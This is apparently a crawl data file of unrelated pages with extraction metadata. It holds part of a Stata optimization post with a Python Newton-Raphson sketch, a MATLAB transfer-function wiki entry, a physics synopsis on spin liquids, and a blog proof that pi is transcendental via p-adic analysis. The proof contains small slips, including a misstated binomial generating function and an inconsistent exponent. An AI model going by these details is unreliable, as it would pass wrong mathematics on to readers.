Stata. I recommend that you start at the beginning. See Programming an estimation command in Stata: A map to posted entries for a map to all the posts in this series. A quick review of nonlinear optimization We want to maximize a real-valued function $$Q(\thetab)$$, where $$\thetab$$ is a $$p\times 1$$ vector of parameters. Minimization is done by maximizing $$-Q(\thetab)$$. We require that $$Q(\thetab)$$ is twice, continuously differentiable, so that we can use a second-order Taylor series to approximate $$Q(\thetab)$$ in a neighborhood of the point $$\thetab_s$$, $Q(\thetab) \approx Q(\thetab_s) + \gb_s'(\thetab -\thetab_s) + \frac{1}{2} (\thetab -\thetab_s)’\Hb_s (\thetab -\thetab_s) \tag{1}$ where $$\gb_s$$ is the $$p\times 1$$ vector of first derivatives of $$Q(\thetab)$$ evaluated at $$\thetab_s$$ and $$\Hb_s$$ is the $$p\times p$$ matrix of second derivatives of $$Q(\thetab)$$ evaluated at $$\thetab_s$$, known as the Hessian matrix.
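As a language-neutral companion to the posts above (which do everything in Mata with optimize() and moptimize()), here is a rough Python sketch of the same Newton-Raphson recipe applied to the Poisson log-likelihood: iterate $\theta_{s+1} = \theta_s - H_s^{-1} g_s$, the maximizer of the quadratic approximation (1), until the parameters stop changing. This is not the code from the series; the function and names below are my own, and it omits the step-halving and convergence safeguards a production optimizer would add.

```python
import numpy as np

def poisson_newton(y, X, tol=1e-10, max_iter=50):
    """Maximize the Poisson log-likelihood
    l(b) = sum_i [ y_i*(x_i'b) - exp(x_i'b) - ln(y_i!) ]
    by Newton-Raphson; returns the estimate and an IID-based VCE."""
    b = np.zeros(X.shape[1])                  # starting values
    for _ in range(max_iter):
        mu = np.exp(X @ b)                    # E[y_i | x_i] = exp(x_i'b)
        g = X.T @ (y - mu)                    # gradient g_s
        H = -(X * mu[:, None]).T @ X          # Hessian H_s (negative definite)
        b_new = b - np.linalg.solve(H, g)     # theta_{s+1} = theta_s - H^{-1} g
        if np.max(np.abs(b_new - b)) < tol:
            return b_new, np.linalg.inv(-H)   # VCE from the observed information
        b = b_new
    raise RuntimeError("Newton-Raphson did not converge")

# Simulated check: the estimates should be close to (0.5, 0.3).
rng = np.random.default_rng(12345)
X = np.column_stack([np.ones(1000), rng.normal(size=1000)])
y = rng.poisson(np.exp(X @ np.array([0.5, 0.3])))
b_hat, V_iid = poisson_newton(y, X)
```

A robust VCE would replace the inverse observed information with the usual sandwich form built from the observation-level scores, $(-H)^{-1}\left(\sum_i g_i g_i'\right)(-H)^{-1}$, which is the kind of robust estimator the post refers to.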
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8295153975486755, "perplexity": 771.6493558824662}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496668534.60/warc/CC-MAIN-20191114182304-20191114210304-00082.warc.gz"}
http://wikis.controltheorypro.com/MATLAB_tf
MATLAB tf ## 1 Introduction to MATLAB's tf command Transfer functions are easily created in MATLAB using the tf command. (The tf command requires the Control System Toolbox.) This command accepts two vectors - one for the numerator and one for the denominator. ## 2 Basic Usage for MATLAB's tf command The basic usage of MATLAB's tf command is >> sys = tf(num, den); where: num is a vector representing the coefficients of the numerator and den is a vector representing the coefficients of the denominator. For example, a transfer function like this $H\left( s \right) = \frac{s+2}{s^2+3s+10}$ becomes >> num = [1 2]; >> den = [1 3 10]; Notice that MATLAB determines the order from the number of elements in the vectors. If the numerator had been $s^2+2$ then >> num = [1 0 2]; would be the correct vector.
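An aside not in the original wiki article: readers without MATLAB can reproduce the same example in Python with SciPy, which uses the identical highest-power-first coefficient convention.

```python
# SciPy analogue of the MATLAB example above (an aside, not from the article).
from scipy import signal

num = [1, 2]        # numerator s + 2
den = [1, 3, 10]    # denominator s^2 + 3s + 10
sys = signal.TransferFunction(num, den)
print(sys)          # the repr shows the stored numerator/denominator arrays
```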
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 2, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8868213295936584, "perplexity": 2650.321076144421}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218191396.90/warc/CC-MAIN-20170322212951-00259-ip-10-233-31-227.ec2.internal.warc.gz"}
https://physics.aps.org/synopsis-for/10.1103/PhysRevLett.110.207208
# Synopsis: Pool of Candidate Spin Liquids Grows A new vanadium compound exhibits the telltale features of a quantum spin liquid—a material that resists magnetic ordering down to absolute zero. At low enough temperature, the spins in a magnetic material will typically “freeze” in a particular arrangement. However, certain materials have lattice structures that interfere with, or frustrate, this spin freezing even at absolute zero. Physicists proposed the existence of these quantum “spin liquids” 40 years ago, but experimental evidence emerged only in the last few years. Now, a team of researchers has identified a new spin liquid candidate. As described in Physical Review Letters, the material has unique features that could provide another avenue for studying spin liquid physics. The simplest model of a spin liquid is an antiferromagnet with a triangle-shaped lattice: Interactions between the ions favor antiparallel spins, but the triangular geometry forces two spins to point in the same direction. This frustration causes the spins to constantly fluctuate between different arrangements. The resulting liquidlike state may have relevance in high-temperature superconductivity and future quantum computing technologies. But other than a naturally occurring mineral called herbertsmithite, which has a kagome lattice of corner-sharing triangles, spin liquid behavior hasn’t been observed in any actual materials. In 2011, chemists synthesized a new kagome antiferromagnet, designated DQVOF, which is unique from herbertsmithite and other similar compounds in that its magnetic properties stem from ions of vanadium, rather than copper. To better understand the material, Lucy Clark of the University of Edinburgh, UK, and colleagues studied the samples with muon spin relaxation experiments. Their data show an absence of spin freezing down to $40$ millikelvin, which is a clear spin liquid signature. Confirming DQVOF’s spin liquid status may require more detailed observations of its magnetic excitation spectrum. – Michael Schirber More Features » ### Announcements More Announcements » Magnetism ## Previous Synopsis Atomic and Molecular Physics ## Next Synopsis Quantum Information ## Related Articles Spintronics ### Synopsis: Material Covers All the Bases for Spintronic Memories Multilayer structures of cobalt and nickel have ideal properties for next-generation spintronic memory devices. Read More » Magnetism ### Viewpoint: Watching a Quantum Magnet Grow in Ultracold Atoms Two experiments watch an antiferromagnetic phase of matter emerge in ultracold Rydberg atoms, opening up a new platform for quantum simulation. Read More » Magnetism ### Synopsis: Magnetic Cloak Without Superconductors A new magnetic-cloak device works without requiring cryogenically cooled superconductors. Read More »
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 5, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5910567045211792, "perplexity": 3922.592732946527}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267156901.47/warc/CC-MAIN-20180921072647-20180921093047-00083.warc.gz"}
https://mattbaker.blog/2015/03/20/a-p-adic-proof-that-pi-is-transcendental/
# A p-adic proof that pi is transcendental Ferdinand von Lindemann In my last blog post, I discussed a simple proof of the fact that pi is irrational.  That pi is in fact transcendental was first proved in 1882 by Ferdinand von Lindemann, who showed that if $\alpha$ is a nonzero complex number and $e^\alpha$ is algebraic, then $\alpha$ must be transcendental.  Since $e^{i \pi} = -1$ is algebraic, this suffices to establish the transcendence of $\pi$ (and setting $\alpha = 1$ it shows that $e$ is transcendental as well).  Karl Weierstrass proved an important generalization of Lindemann’s theorem in 1885. The proof by Lindemann that pi is transcendental is one of the crowning achievements of 19th century mathematics.  In this post, I would like to explain a remarkable 20th century proof of the Lindemann-Weierstrass theorem due to Bezivin and Robba [Annals of Mathematics Vol. 129, No. 1 (Jan. 1989), pp. 151-160], which uses p-adic analysis in a key way.  Their original argument was made substantially more elementary by Beukers in this paper; we refer the reader to [American Mathematical Monthly Vol. 97 Issue 3 (Mar. 1990), pp. 193-197] for a lovely exposition of the resulting proof, which rivals any of the usual approaches in its simplicity.  But I’d like to focus here on the original Bezivin-Robba proof, which deserves to be much better known than it is.  In the concluding remarks, we will briefly discuss a 21st century theorem of Bost and Chambert-Loir that situates the Bezivin-Robba approach within a much broader mathematical framework. An equivalent assertion Let $\overline{{\mathbb Q}}$ be the subfield of ${\mathbb C}$ consisting of all complex numbers which are algebraic (over ${\mathbb Q}$).  The Lindemann-Weierstrass theorem is the following statement: (L-W) Let $\alpha_1,\ldots,\alpha_m \in \overline{{\mathbb Q}}$ be distinct algebraic numbers.  Then $e^{\alpha_1},\ldots,e^{\alpha_m}$ are linearly independent over $\overline{{\mathbb Q}}$. A relatively simple argument shows that (L-W) is equivalent to a rather different-looking assertion about formal power series which are represented by rational functions. It will be convenient to work with power series expansions around infinity rather than zero.  Recall that a function $f : {\mathbb C} \to {\mathbb C}$ is analytic at $\infty$ if the function $g(w) = f(1/w)$ is analytic at $w=0$.  If $g(w)=b_0 + b_1 w + b_2 w^2 + \cdots$ is the power series expansion for $g(w)$ around $0$, we call $f(z) = b_0 + b_1 \frac{1}{z} + b_2 \frac{1}{z^2} + \cdots$ the power series expansion for $f(z)$ around $z=\infty$.  We will be particularly interested in functions $f(z)$ for which $b_0 = 0$ (i.e., which vanish at infinity). We say that a formal power series $v(x) \in {\mathbb C}[[\frac{1}{x}]]$ is analytic at $\infty$ if the power series $u(w) := v(1/w)$ has a nonzero radius of convergence around $w=0$.  And by abuse of terminology, we say that $v(x)$ is a rational function if there are polynomials $P(x),Q(x)$ with $Q(x)$ not identically zero such that the power series expansion of $f(x)=\frac{P(x)}{Q(x)}$ around $x=\infty$ is equal to $v(x)$.  A rational function vanishes at infinity if and only if ${\rm deg}(P) < {\rm deg}(Q)$. Let $K$ be a field, and let ${\mathcal F}_K := \frac{1}{x}K[[\frac{1}{x}]]$ be the ring of formal power series over $K$ in $\frac{1}{x}$ which vanish at infinity.  Let ${\mathcal D} : {\mathcal F}_{\mathbb C} \to {\mathcal F}_{\mathbb C}$ be the differential operator ${\mathcal D}(v) = v + v'$.  
We will show that (L-W) is equivalent to the following statement: (B-R) If $v \in {\mathcal F}_{\mathbb Q}$ is analytic at infinity and ${\mathcal D}(v)$ is a rational function, then $v$ is also a rational function. Note that the conclusion of (B-R) can fail for functions with an essential singularity at infinity; for example, ${\mathcal D}(e^{-x}) = 0$ but $e^{-x}$ is not a rational function. Proof of the equivalence The proof that (L-W) and (B-R) are equivalent is based on properties of the Laplace transform.  Define the formal Laplace transform ${\mathcal L} : {\mathbb C}[[z]] \to {\mathcal F}_{\mathbb C}$ by ${\mathcal L}(\sum_{n=0}^\infty a_n z^n) = \sum_{n=0}^\infty \frac{n! a_n}{x^{n+1}}.$ (This is just the extension of the usual Laplace transform to the setting of formal power series.)  The map ${\mathcal L} : {\mathbb C}[[z]] \to {\mathcal F}_{\mathbb C}$ is clearly a bijection. We will make use of the following standard facts from complex analysis: (L1) $f(z) \in {\mathbb C}[[z]]$ defines an entire function of exponential growth (i.e. $|f(z)| \leq C_1 e^{C_2 |z|}$ for some $C_1, C_2$) if and only if ${\mathcal L}(f)$ is analytic at infinity. (L2) $f(z) \in {\mathbb C}[[z]]$ is the power series expansion around $z=0$ of an exponential polynomial $p_1(z)e^{a_1 z} + \cdots + p_n(z)e^{a_n z}$ if and only if ${\mathcal L}(f)$ is a rational function.  This gives a bijection between exponential polynomials and rational functions vanishing at infinity. The proof of (L2), which is based on the partial fractions decomposition of rational functions and the fact that ${\mathcal L}(e^{az}) = \frac{1}{1-ax}$, shows that $p_i(z) \in \overline{{\mathbb Q}}[z]$ and $a_i \in \overline{{\mathbb Q}}$ for all $i$ if and only if ${\mathcal L}(f) \in \overline{{\mathbb Q}}(x).$ We will also need the following lemma, whose proof we leave as an exercise: Lemma: Define $\delta : {\mathbb C}[[z]] \to {\mathbb C}[[z]]$ by $\delta(f(z)) = (z-1)f(z)$, and let ${\mathcal D} : {\mathcal F}_{\mathbb C} \to {\mathcal F}_{\mathbb C}$ be as above.  Then $\delta$ and ${\mathcal D}$ are bijections, and ${\mathcal D}({\mathcal L}(f))= {\mathcal L}(\delta(f)).$ To see that (L-W) implies (B-R), suppose $v \in {\mathcal F}_{\mathbb Q}$ is analytic at infinity and ${\mathcal D}(v)$ is a rational function.  By (L2), there is an exponential polynomial $f(z)= \sum p_i(z) e^{\alpha_i z}$ with the $\alpha_i$ distinct algebraic numbers and $p_i(z) \in \overline{{\mathbb Q}}[z]$ such that ${\mathcal L}(f) = {\mathcal D}(v)$.  The function $g(z) := \frac{f(z)}{z-1}$ satisfies $\delta(g(z)) = f(z)$, so by the Lemma we have ${\mathcal L}(g)=v$.  As $v$ is analytic at infinity, we know by (L1) that $g$ is entire, and hence $f(1)=0$.  By (L-W), we must have $p_i(1)=0$, i.e. $(z-1) \mid p_i(z)$, for all $i$.  Thus $g(z)$ is also an exponential polynomial, which implies by (L2) that $v(x)$ is a rational function. To see that (B-R) implies (L-W), assume for the sake of contradiction that $f(1)=0$, where $f(z) := \sum_{i=1}^m \beta_i e^{\alpha_i z}$, the $\alpha_i$ are distinct and algebraic, and the $\beta_i$ are algebraic and nonzero. Replacing $f(z)$ by the product of its Galois conjugates $\sum_{i=1}^m \sigma(\beta_i) e^{\sigma(\alpha_i) z}$, we may assume without loss of generality that the power series expansion of $f(z)$ lies in ${\mathbb Q}[[z]]$.  (This is a standard reduction which appears in many proofs of (L-W).)  
The Laplace transform of $f(z)$ is ${\mathcal L}(f) = \sum \frac{\beta_i}{1-\alpha_i x},$ which has only simple poles. Moreover, since the $\alpha_i$ are distinct and $f(1)=0$ we must have $m \geq 2$ and some $\alpha_i$ is non-zero; thus ${\mathcal L}(f)$ has at least one simple pole. On the other hand, since $f(1)=0$, the function $g(z) := \frac{f(z)}{z-1}$ is entire and of exponential growth, so by (L1) $v := {\mathcal L}(g) \in {\mathcal F}_{\mathbb C}$ is analytic at infinity.  The Lemma tells us that ${\mathcal L}(f) = {\mathcal D}(v)$, so ${\mathcal D}(v)$ has only simple poles.  However, it is easy to see that if $u$ is a rational function then ${\mathcal D}(u) = u + u'$ can never have a simple pole.   Thus $v$ is not a rational function, contradicting (B-R). Rationality of formal power series In order to prove (B-R), we need to show that if $v \in {\mathcal F}_{\mathbb Q}$ is analytic at infinity and ${\mathcal D}(v)$ is a rational function, then $v$ is also a rational function.  For this, we need some kind of robust criterion for determining whether a formal power series with coefficients in ${\mathbb Q}$ represents a rational function.  There is a long history of such results culminating in what one might call the Borel-Polya-Dwork-Bertrandias criterion, which will turn out to be exactly what we need.  We interrupt our regularly scheduled proof to give a brief history of these developments. Borel Around 1894, Emile Borel noticed that if $f(z)=\sum_{n=0}^\infty a_n z^n$ is a power series with integer coefficients defining an analytic function on a closed disc of radius $R > 1$ in ${\mathbb C}$, then $f(z)$ must in fact be a polynomial.  This is a simple consequence of Cauchy’s integral formula, which shows that if $|f| \leq M$ on the disc then $|a_n| < \frac{M}{2\pi R^{n+1}}$.  Since the $a_n$ are assumed to be integers, the inequality implies that $a_n = 0$ for all sufficiently large $n$. Borel extended this argument to show: Theorem (Borel): If $f(z)=\sum_{n=0}^\infty a_n z^n$ is the power series expansion around $z=0$ of a meromorphic function on a closed disc of radius $R > 1$ in ${\mathbb C}$, and the coefficients $a_n$ are all integers, then $f(z)$ is a rational function. The proof is based on the following well-known characterization of rational functions, whose proof we omit (see Lemma 9 in this blog post by Terry Tao): Lemma (Kronecker): Let ${\mathbf a} = \{ a_n \}_{n \geq 0}$ be a sequence of complex numbers.  Then the following are equivalent: (R1) $f(z) =\sum_{n=0}^\infty a_n z^n$ represents a rational function. (R2) The Kronecker-Hankel determinant $K_N({\mathbf a}) = \begin{vmatrix} a_0 & a_1 & a_2 & \dots & a_N \\ a_1 & a_2 & a_3 & \dots & a_{N+1} \\ \hdotsfor{5} \\ a_N & a_{N+1} & a_{N+2} & \dots & a_{2N} \end{vmatrix}$ is zero for $N$ sufficiently large. The idea behind the proof of the more general result of Borel is to use the above Cauchy estimate (applied to the product of $f(z)$ with some polynomial), together with standard facts about determinants, to show that if $f$ is meromorphic on a closed disc of radius $R > 1$ then $K_N({\mathbf a}) \to 0$ as $N \to \infty$.  If the $a_n$ are all integers, this forces $K_N({\mathbf a}) = 0$ for $N$ sufficiently large. Polya Around 1916, George Polya realized that the proof of Borel’s theorem via Kronecker-Hankel determinants could be generalized by replacing the radius of convergence with the transfinite diameter of the region of convergence. 
The transfinite diameter is a measure of the size of a set which generalizes the radius of a disc.  It has many uses in complex analysis and potential theory (as well as in number theory).  The diameter of a bounded set $A$ in some metric space $X$ is the maximum distance between two points of $A$, and one can generalize this to the $N^{\rm th}$ diameter $\delta_N(A)$, which by definition is the supremum over all $N$-tuples $(z_1,\ldots,z_N) \in A^N$ of the geometric mean of the pairwise distances between the $z_i$: $\delta_N(A) = \sup_{z_1,\ldots,z_N \in A} \left( \prod_{i \neq j} |z_i - z_j| \right)^{\frac{1}{n(n-1)}}.$ It turns out that $\{ \delta_N \}_{N \geq 2}$ forms a monotonically decreasing sequence and thus one can define the transfinite diameter $\delta_\infty(A) := \lim_{N \to \infty} \delta_N(A).$ The transfinite diameter of a disc in any algebraically closed normed field (e.g. ${\mathbb C}$) is its radius, and the transfinite diameter of a real line segment is one-quarter of its length. It will be convenient for the statement of Polya’s theorem, and for our application to the Lindemann-Weierstrass theorem, to work with $g(z) = \frac{1}{z} f(\frac{1}{z})$ instead of $f(z)$ in Borel’s theorem, and to study the transfinite diameter of the complement of the region of convergence. Theorem (Polya): If $g(z)=\sum_{n=0}^\infty \frac{a_n}{z^{n+1}}$ is a power series with integer coefficients which can be continued to a meromorphic function on the complement of a bounded set $A \subset {\mathbb C}$ containing $0$ with $\delta_\infty(A) < 1$, then $g(z)$ is a rational function. The condition $\delta_\infty(A) < 1$ in Polya’s theorem is sharp: the series $g(z) = \sum_{n=0}^\infty \binom{2n}{n} z^n$ has integer coefficients and can be extended to the analytic function $\sqrt{1 - \frac{4}{z}}$ on the complement of the real segment $[0,4]$, which has transfinite diameter equal to 1.  However, $\sqrt{1 - \frac{4}{z}}$ is not a rational function. Dwork Bernard Dwork noticed around 1960 that Borel’s theorem has a $p$-adic analogue, and this observation is a key ingredient in Dwork’s famous proof of Weil’s conjecture that the zeta function of an algebraic variety over a finite field is a rational function.  Dwork realized, in fact, that one could deduce both Borel’s theorem and its $p$-adic analogue from the following global result.  (For the statement, we let ${\mathbb C}_v$ denote the completion of an algebraic closure of the $v$-adic completion of ${\mathbb Q}$.  For $v = \infty$ this is just ${\mathbb C}$; for $v$ corresponding to a prime number $p$ it is a p-adic analogue of the complex numbers.) Theorem (Dwork): Suppose $f(z)=\sum_{n=0}^\infty a_n z^n$ is a power series with rational coefficients. Let $S$ be a finite set of places of ${\mathbb Q}$, containing the infinite place, such that: (D1) For $p \not\in S$, $|a_n|_p\leq 1$ for all $n \geq 0$ (i.e., $a_n$ is a $p$-adic integer). (D2) For $v \in S$, $f(z)$ extends to a meromorphic function on a disc $D_v$ of radius $R_v$ in ${\mathbb C}_v$ and $\prod_{v \in S} R_v > 1$. Then $f(z)$ is a rational function. The proof of Dwork’s theorem in the special case where $f$ is analytic (rather than just meromorphic) in each $D_v$ is not difficult.  In this case, for $v \in S$ corresponding to a prime number $p$, the $p$-adic convergence of $f$ on $D_p$ means that $|a_n| R_p^n \to 0$ as $n \to \infty$.  This implies that there is a constant $M_p$ such that $|a_n|_p \leq \frac{M_p}{R_p^{n+1}}$ for all $n$.  
And as above, the Cauchy estimate implies that $|a_n|_\infty \leq \frac{M_\infty}{R_\infty^{n+1}}$ for some constant $M_\infty$.  Thus (setting $M = \prod_{v \in S} M_v$ and $R = \prod_{v \in S} R_v$) $\prod_{v \in S} |a_n|_v \leq \frac{M}{R^{n+1}} \to 0$ as $n \to \infty$.  On the other hand, the product formula shows that if $a_n \neq 0$ then $\prod_{v \in S} |a_n|_v \geq \prod_{{\rm all \;} v} |a_n|_v = 1.$ It follows that $a_n = 0$ for $n$ sufficiently large, and $f$ is a polynomial. Bertrandias The transfinite diameter makes sense in any metric space, and in particular we can define it for subsets of the “p-adic complex numbers” ${\mathbb C}_p$.  Bertrandias put several of the above ingredients together and proved the following common generalization of the theorems of Borel, Polya, and Dwork around 1963. Theorem (Bertrandias): Let $g(z)=\sum_{n=0}^\infty \frac{a_n}{z^{n+1}}$ with $a_n \in {\mathbb Q}$ for all $n \geq 0$.  Let $S$ be a finite set of places of ${\mathbb Q}$, containing the infinite place, such that: (B1) For $p \not\in S$, $|a_n|_p \leq 1$ for all $n \geq 0$ (i.e., $a_n$ is a $p$-adic integer). (B2) For $v \in S$, $g(z)$ extends to a meromorphic function on the complement of a bounded set $K_v \subset {\mathbb C}_v$ (which is assumed to be a finite union of discs if $v$ is non-Archimedean) and $\prod_{v \in S} \delta_\infty(K_v) < 1$. Then $g(z)$ is a rational function. The proof is based on Kronecker-Hankel determinants and the product formula, like the proof of Dwork’s theorem above.  For simplicity we have assumed that the $a_n$ lie in ${\mathbf Q}$, but the statement and proof of Bertrandias’s theorem generalize easily to any number field $K$.  We will only use the special case of the theorem of Bertrandias in which each extension of $g(z)$ is assumed to be analytic. The proof of assertion (B-R) We are finally ready to explain Bezivin and Robba’s proof of assertion (B-R), which as we have seen implies the Lindemann-Weierstrass theorem (and hence the transcendence of $\pi$).  Perhaps the most interesting aspect of the proof is that it is the p-adic places which will be used to verify the hypotheses of Bertrandias’s theorem. Let $\omega(x)= v(x) + v'(x)$, which by assumption is a rational function, and let $\omega(x) = \sum_{i,j} \frac{c_{ij}}{(x - \gamma_i)^j}$ be the partial fraction expansion for $\omega$, where $\gamma_1,\ldots,\gamma_m$ are distinct algebraic numbers. Using the formal inverse $(I + \frac{d}{dx})^{-1} = \sum_{k \geq 0} (-1)^k \frac{d^k}{dx^k}$ for ${\mathcal D}$, one verifies easily that $v$ has the following explicit partial fraction expansion: (*) $v(x) = \sum_{i,j} c_{ij} \sum_{k \geq 0} \binom{k+j-1}{j-1} \frac{k!}{(x - \gamma_i)^{k+j}}.$ Let $S_1$ be a finite set of places of ${\mathbb Q}$ containing the Archimedean place such that for $p \not\in S_1$, all of the nonzero $c_{i,j}$ and $\gamma_i$ have p-adic absolute value 1, and such that $|\gamma_i - \gamma_j|_p = 1$ for all $i \neq j$.  The explicit formula (*) shows that for $p \not\in S_1$ the coefficients $a_n$ of $v(x) = \sum_{n \geq 0} \frac{a_n}{x^{n+1}}$ are $p$-adic integers.  Thus $v(x)$ satisfies hypothesis (B1) for any set of places $S$ containing $S_1$. For $v \in S_1$, formula (*) shows that the series defining $v(x)$ converges outside a disc $K_v \subset {\mathbb C}_v$ of some positive radius $R_v$. 
For $p \not\in S_1$, formula (*) shows that the series defining $v(x)$ converges in the complement of a set $K_p \subset {\mathbb C}_p$ which is a union of discs $D_i$ centered at the various $\gamma_i$.  Since the series $\sum_{k=0}^\infty k! x^k$ has p-adic radius of convergence equal to $p^{\frac{1}{p-1}}$, we can take the radii of the discs $D_i$ to be $p^{-\frac{1}{p-1}}$.  By our assumptions on $S_1$, the discs $D_1,\ldots D_m$ are distinct, and it is a simple exercise using the non-Archimedean triangle inequality to prove that $\delta_\infty \left( \bigcup_{i=1}^m D_i \right) = p^{-\frac{1}{m(p-1)}}.$ Since the series $\sum_{{\rm primes \;} p} \frac{1}{p \log p}$ diverges, the infinite product $\prod_{p \not\in S_1} \delta_\infty(K_p)$ diverges to zero.  Thus there exists a set of places $S$ containing $S_1$ such that $\prod_{v \in S} \delta_\infty(K_v) < 1.$ For this choice of $S$, $v(x)$ satisfies both (B1) and (B2) and thus $v(x)$ is a rational function.  Q.E.D. Concluding remarks 1. My formulation of (B-R), and the accompanying exposition of the proof that (L-W) and (B-R) are equivalent, differs a bit from Bezivin and Robba’s.   They work with power series $u(x) \in {\mathbb C}[[x]]$ and the differential operator ${\mathcal D}'(u) = x^2 u' + (x-1) u$ instead, which amounts to the same thing via the transformation $v(x) = \frac{1}{x} u(\frac{1}{x})$.  (I thank Xander Flood for helping me with the details of how to translate smoothly between the two settings.) 2. In their paper, Bezivin and Robba generalize assertion (B-R) to an arbitrary linear differential operator ${\mathcal D}$ with polynomial coefficients for which $\infty$ is a totally irregular singular point.  In the special case ${\mathcal D}(v) = v' + v$, the proof is significantly simpler than the general case because one has an explicit inverse operator.  In the general case, one needs to use techniques from the theory of $p$-adic differential equations to establish the properties (B1) and (B2). 3. The converses of the theorems of Borel, Polya, Dwork, and Bertrandias are clearly true as well, so these results give a precise characterization of rational functions among formal power series of a certain type. 4. A proof of the theorem of Bertrandias appears in Chapter 5 of Amice’s unfortunately out-of-print book Les Nombres p-adiques. 5. For a deeper understanding of p-adic transfinite diameters, it is very useful to work with Berkovich spaces.  See for example my book with Robert Rumely, in which we prove (as in the classical case) that the transfinite diameter of a compact set $K \subset {\mathbf A}^1_{\rm Berk}$ coincides with its capacity, defined in terms of a probability measure of minimum energy supported on $K$. 6. The theorem of Bost and Chambert-Loir mentioned in the introduction is a generalization of the theorem of Bertrandias giving a criterion for a formal meromorphic function on an algebraic curve to be the germ of a rational function.  The proof uses Arakelov geometry.  Bost and Chambert-Loir view their theorem, and its proof, as an arithmetic counterpart of the following theorem from algebraic geometry: Theorem (Hartshorne): Let $X$ be a complex projective surface and $H$ an ample effective divisor on $X$.  Then any formal meromorphic function along $H$ is the restriction of a rational function on $X$. For more details and background related to the theorem of Bost and Chambert-Loir, see http://www.math.u-psud.fr/~chambert/publications/pdf/toronto2008.pdf
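A footnote to the convergence claim used in the proof of (B-R) above (this verification is my addition, not part of the original post): the assertion that $\sum_{k \geq 0} k!\, x^k$ has $p$-adic radius of convergence $p^{\frac{1}{p-1}}$ follows from Legendre's formula. Writing $s_p(k)$ for the sum of the base-$p$ digits of $k$, one has $v_p(k!) = \sum_{i \geq 1} \lfloor k/p^i \rfloor = \frac{k - s_p(k)}{p-1},$ so $|k!|_p = p^{-(k - s_p(k))/(p-1)}$ and $\lim_{k \to \infty} |k!|_p^{1/k} = p^{-1/(p-1)}$ because $s_p(k)/k \to 0$. The radius of convergence is therefore $1/\limsup_k |k!|_p^{1/k} = p^{\frac{1}{p-1}}$. Since the series in (*) is a power series in $\frac{1}{x-\gamma_i}$, it converges $p$-adically whenever $|x - \gamma_i|_p > p^{-\frac{1}{p-1}}$, which is why the discs $D_i$ can be taken to have radius $p^{-\frac{1}{p-1}}$.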
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 293, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9879916310310364, "perplexity": 158.83278290727222}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-30/segments/1500549424945.18/warc/CC-MAIN-20170725002242-20170725022242-00438.warc.gz"}
http://www.eoht.info/page/Negative%20entropy
